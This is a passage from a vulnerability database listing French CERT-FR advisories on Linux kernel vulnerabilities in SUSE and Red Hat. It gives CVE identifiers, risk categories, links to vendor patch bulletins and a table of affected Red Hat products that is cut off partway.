"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2023-54070",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54070"
},
{
"name": "CVE-2023-54204",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54204"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2026-23112",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23112"
},
{
"name": "CVE-2025-68313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68313"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2023-54303",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54303"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-23190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23190"
},
{
"name": "CVE-2025-40123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40123"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2023-53816",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53816"
},
{
"name": "CVE-2025-40297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40297"
},
{
"name": "CVE-2025-68217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68217"
},
{
"name": "CVE-2025-40178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40178"
},
{
"name": "CVE-2025-68289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68289"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2025-40253",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40253"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2025-40317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40317"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2023-54135",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54135"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2025-68233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68233"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2024-26944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26944"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2025-40316",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40316"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54314"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2023-54172",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54172"
},
{
"name": "CVE-2023-54113",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54113"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2026-23082",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23082"
},
{
"name": "CVE-2023-53836",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53836"
},
{
"name": "CVE-2026-23155",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23155"
},
{
"name": "CVE-2025-40288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40288"
},
{
"name": "CVE-2025-68239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68239"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2023-53857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53857"
},
{
"name": "CVE-2023-53860",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53860"
},
{
"name": "CVE-2025-68185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68185"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2023-54169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54169"
},
{
"name": "CVE-2025-40268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40268"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2023-54281",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54281"
},
{
"name": "CVE-2026-23113",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23113"
},
{
"name": "CVE-2025-71231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71231"
},
{
"name": "CVE-2023-54080",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54080"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2026-23157",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23157"
},
{
"name": "CVE-2025-68810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68810"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2025-40337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40337"
},
{
"name": "CVE-2025-40346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40346"
},
{
"name": "CVE-2025-40262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40262"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2023-54022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54022"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2023-54296",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54296"
},
{
"name": "CVE-2025-40244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40244"
},
{
"name": "CVE-2025-68735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68735"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2023-54220",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54220"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2023-54209",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54209"
},
{
"name": "CVE-2025-40275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40275"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2026-25702",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25702"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2025-40223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40223"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2023-53831",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53831"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68195"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2023-53768",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53768"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2023-54099",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54099"
},
{
"name": "CVE-2025-40319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40319"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2024-53093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53093"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2023-54261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54261"
},
{
"name": "CVE-2023-54005",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54005"
},
{
"name": "CVE-2025-40351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40351"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2026-23154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23154"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-03-27T00:00:00",
"last_revision_date": "2026-03-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0369",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-27T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20774-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620774-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0970-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260970-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0983-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260983-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0985-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260985-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1077-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261077-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20778-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620778-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20779-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620779-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0961-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260961-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1073-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261073-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20789-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620789-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0946-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260946-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0962-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260962-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0967-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260967-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20775-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620775-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1088-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261088-1"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0939-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260939-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20814-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620814-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1046-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261046-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20788-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620788-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20786-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620786-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0954-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260954-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20819-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620819-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1045-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261045-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20815-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620815-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1060-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261060-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20790-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620790-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20772-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620772-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20776-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620776-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1002-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261002-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0984-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260984-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0964-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260964-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20781-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620781-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1081-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261081-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1048-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261048-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1059-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261059-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0958-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260958-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1000-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261000-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1039-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261039-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20791-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620791-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20773-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620773-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20816-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620816-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1083-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261083-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0951-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260951-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20787-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620787-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0992-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260992-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20777-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620777-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1089-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261089-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1078-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261078-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0997-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260997-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1003-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261003-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20794-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620794-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1041-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261041-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20780-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620780-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1049-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261049-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1044-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261044-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20817-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620817-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20782-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620782-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20792-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620792-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0953-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260953-1"
}
]
}
CERTFR-2026-AVI-0496
Vulnerability from certfr_avis - Published: 2026-04-24 - Updated: 2026-04-24
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.4 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 8 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - TUS 8.6 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 7 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 10 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - TUS 8.8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Real Time 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 9 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.6 s390x | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 10 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support 7 x86_64 | ||
